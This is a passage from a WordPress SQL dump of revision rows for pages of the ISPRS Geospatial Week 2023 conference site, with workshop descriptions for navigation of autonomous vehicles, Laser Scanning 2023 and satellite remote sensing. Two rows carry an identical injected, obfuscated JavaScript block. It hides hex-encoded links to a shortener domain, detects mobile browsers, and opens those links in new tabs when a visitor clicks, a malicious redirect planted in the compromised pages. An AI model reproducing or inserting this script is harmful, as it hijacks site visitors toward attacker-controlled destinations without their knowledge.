<li>\r\n<h6><strong>Caroline Channel, ISAE-Supaero, France</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Ashraf Abosekeen, Military Technical College, Cairo, Egypt.</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Umar Iqbal, Mississippi State University, USA</strong></h6>\r\n</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','NGC of AV: Navigation, Guidance and Control of Autonomous Vehicles','','inherit','closed','closed','','2856-revision-v1','','','2023-02-05 14:17:05','2023-02-05 14:17:05','',2856,'https://gsw2023.com/?p=3829',0,'revision','',0),
(3830,1,'2023-02-05 14:19:45','2023-02-05 14:19:45','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2954\" img_size=\"1600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Laser Scanning 2023</strong></span></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>Laser scanning 2023 is the 12th of a series of ISPRS workshops covering various aspects of space-borne, airborne, mobile and terrestrial laser scanning in， indoor, underground and outdoor environments. The workshop brings together experts who focus on processing and using point cloud data acquired from laser scanners and other active 3D imaging systems, such as range cameras and gaming sensors including terrestrial, mobile, aerial, unoccupied aerial and space-borne sensing platforms. Topics include all aspects related to sensor calibration, data acquisition and data processing including notably registration, feature extraction, classification, segmentation, object detection, big data processing, data fusion, 3D modelling, BIM and change analysis. The workshop will be part of the ISPRS Geospatial Week 2023 and in Cairo, Egypt in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions. </strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\"][vc_single_image image=\"2953\" alignment=\"center\"][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2950\" alignment=\"center\"][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2955\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><u>Chairs</u></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"54\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:Blue;\"><strong><u>Themes of event:</u></strong></h5>\n<table width=\"0\">\n<tbody>\n<tr>\n<td width=\"288\">\n<h5><strong>Acquisition </strong></h5>\n<p>•      Airborne, terrestrial, automotive, bathymetric LIDAR</p>\n<p>•      Range imaging and gaming sensors</p>\n<p>•      Single Photon LIDAR, Multi-spectral LIDAR, Solid-state LIDAR</p>\n<p>•      Ubiquitous point cloud sensing and mapping</p>\n<p>&nbsp;</td>\n<td width=\"274\">\n<h5><strong>System and Signal analysis </strong></h5>\n<p>•      Sensor and system calibration and validation</p>\n<p>•      Error modelling</p>\n<p>•      Data fusion (LiDAR, RADAR, imagery)</p>\n<p>•      Denoising</p>\n<p>&nbsp;</td>\n</tr>\n<tr>\n<td width=\"288\">\n<h5><strong>Point Cloud Processing </strong></h5>\n<p>•      Point cloud registration &amp; denoising</p>\n<p>•      Segmentation</p>\n<p>•      Classification</p>\n<p>•      fusion</p>\n<p>•      3D Modelling</p>\n<p>•      Feature extraction and object recognition</p>\n<p>•      Change analysis</p>\n<p>•      Big Data processing</p>\n<p>•      Scan-to-BIM</p>\n<p>&nbsp;</td>\n<td width=\"274\">\n<h5><strong>Applications</strong></h5>\n<p>•        Thematic mapping and monitoring</p>\n<p>•        Modelling anthropogenic and natural areas</p>\n<p>•        Natural resource mapping</p>\n<p>•        Biodiversity assessment</p>\n<p>•        Precision farming</p>\n<p>•        Forest mapping and carbon storage</p>\n<p>•        Geohazards analysis</p>\n<p>•        Infrastructure monitoring</p>\n<p>•        Large-scale urban modelling</td>\n</tr>\n</tbody>\n</table>\n<p>&nbsp;</p>\n<p><u> </u></p>\n<p><u> </u></p>\n<p><u> </u></p>\n<h5 style=\"text-align:justify; color:Blue;\"><u>Scientific Committee:</u></h5>\n<p>tbc.</p>\n<p>&nbsp;</p>\n<h5 style=\"text-align:justify; color:Blue;\"><u>Supporting ISPRS Working Groups:</u></h5>\n<ul>\n<li>WG II/2 Point cloud acquisition and processing</li>\n</ul>\n<p><u> </u>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Laser Scanning 2023</strong>','','inherit','closed','closed','','2949-revision-v1','','','2023-02-05 14:19:45','2023-02-05 14:19:45','',2949,'https://gsw2023.com/?p=3830',0,'revision','',0),
(3831,1,'2023-02-05 14:21:28','2023-02-05 14:21:28','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3019\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">Satellite Remote Sensing and Its Applications</span></strong></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: black;\">Satellite-based Remote Sensing plays a vital role in a wide spectrum of applications. In this workshop, we target areas related to advancing high-resolution and mid-resolution remote sensing data acquisition and sensor modeling combined with new data processing techniques for information extraction, including machine learning and deep learning. We are also interested in advances in Remote Sensing that help find solutions to modern human problems, including combating climate change and addressing sustainable development. We encourage participation from academia, space agencies, government stakeholders and industrial research and development leaders to share their latest technology and research developments related, but not limited, to the following themes.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: 